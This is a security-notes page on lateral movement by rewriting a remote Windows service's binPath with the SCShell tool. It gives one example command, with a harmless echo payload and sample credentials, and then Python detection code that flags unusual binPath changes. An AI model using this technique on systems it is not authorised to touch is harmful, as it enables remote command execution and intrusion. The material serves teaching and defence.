# Lateral Movement via Service Configuration Manager

It's possible to execute commands on a remote host by abusing the service configuration manager: change a service's binPath to your malicious command, then restart the service so the payload gets executed. This is all automated by a nice tool, [SCShell](https://github.com/Mr-Un1k0d3r/SCShell).

## Execution

SCShell expects the following arguments: target, service, payload, username, domain, password:

{% tabs %}
{% tab title="attacker\@target" %}

```
.\scshell.exe ws01 XblAuthManager "C:\windows\system32\cmd.exe /c echo 'lateral hello' > c:\temp\lat.txt" spotless offense 123456
```

{% endtab %}
{% endtabs %}

![](/files/-Lttzm9ivnlPHHKxQVgR)

## Considerations

From the defensive side, consider monitoring services that change their binPaths "too often", as this may not be normal in your environment, especially if the new binPath is "very" different ([Levenshtein](https://www.google.com/search?q=levenshtein+distance\&oq=levensht\&aqs=chrome.1.69i57j0l5.2647j0j7\&sourceid=chrome\&ie=UTF-8)) from the previously known good value and if the service configuration is being changed over the network:

![](/files/-Ltu1lvRPsIZAF8PH-j9)
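One way to turn the three signals above (change frequency, Levenshtein distance from the known good binPath, change made over the network) into a check. This is an added example, not code from the original page or from SCShell; the event field names, the baseline values, the thresholds and the sample events are constructed assumptions.

```python
from collections import defaultdict
def levenshtein(a, b):
    """Edit distance, two-row dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                # delete from a
                           cur[j - 1] + 1,             # insert into a
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]

def score_changes(baseline, events, max_ratio=0.4, max_changes=1, window=3600):
    """Return (event, reasons) for every binPath change worth reviewing."""
    alerts, recent = [], defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["host"], ev["service"])
        good, new = baseline.get(key, "").lower(), ev["binpath"].lower()
        # Normalise so long and short paths compare fairly (0 = same, 1 = unrelated).
        ratio = levenshtein(good, new) / max(len(good), len(new), 1)
        # Sliding window of change timestamps per (host, service).
        recent[key] = [t for t in recent[key] if ev["ts"] - t < window] + [ev["ts"]]
        reasons = []
        if ratio > max_ratio:
            reasons.append(f"distance={ratio:.2f}")
        if len(recent[key]) > max_changes:
            reasons.append(f"changes_in_window={len(recent[key])}")
        if reasons and ev["remote"]:
            reasons.append("remote")  # change arrived over the network
        if reasons:
            alerts.append((ev, reasons))
    return alerts

# Constructed sample data; field names and thresholds are assumptions.
SVCHOST = r"C:\Windows\system32\svchost.exe -k netsvcs -p"
BASELINE = {("ws01", "XblAuthManager"): SVCHOST,
            ("ws01", "Agent"): r"C:\Program Files\Agent\1.2.3\agent.exe"}
EVENTS = [
    {"ts": 1000, "host": "ws01", "service": "XblAuthManager", "remote": True,
     "binpath": r"C:\windows\system32\cmd.exe /c echo 'lateral hello' > c:\temp\lat.txt"},
    {"ts": 1005, "host": "ws01", "service": "XblAuthManager", "remote": True,
     "binpath": SVCHOST},  # path put back to the known-good value
    {"ts": 2000, "host": "ws01", "service": "Agent", "remote": False,
     "binpath": r"C:\Program Files\Agent\1.2.4\agent.exe"},  # routine upgrade
]
if __name__ == "__main__":
    for ev, reasons in score_changes(BASELINE, EVENTS):
        print(ev["ts"], ev["service"], ", ".join(reasons))
```

The first constructed event is flagged on distance, the second on frequency, and the local version bump on the `Agent` service is left alone.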

## References

{% embed url="<https://github.com/Mr-Un1k0d3r/SCShell>" %}


